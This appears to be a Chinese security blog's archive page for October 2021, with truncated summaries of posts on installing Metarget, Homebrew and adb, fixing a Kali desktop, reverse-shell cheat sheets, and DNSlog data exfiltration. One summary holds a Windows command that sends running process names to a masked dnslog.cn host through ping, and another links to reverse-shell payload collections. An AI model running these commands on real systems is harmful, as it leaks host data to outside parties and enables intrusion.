10 2021 档案
摘要:Metarget目前仅支持在Ubuntu 16.04和18.04安装运行,在20.04上可能会遇到依赖项问题。安装步骤十分简单。 这里使用Ubuntu 18.04为例进行安装: git clone https://github.com/brant-ruan/metarget.git cd metar
阅读全文
摘要:1.安装homebrew ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 安装adb brew cask install android-platform-tools
阅读全文
摘要:Kali 2021 默认的 xfce 环境成功安装 Parallels Tools重启后会白屏无法进入桌面, 解决办法:重启进入recovery模式,安装 GNOME 桌面环境: apt install kali-desktop-gnome -y 重启后切换桌面环境为 GNOME 即可正常进入桌面。
阅读全文
摘要:在线反弹shell命令速查: https://www.revshells.com/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shel
阅读全文
摘要:1、for循环实现 for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul 2、利用powershell foreach循环实现 powershell -c "Get
阅读全文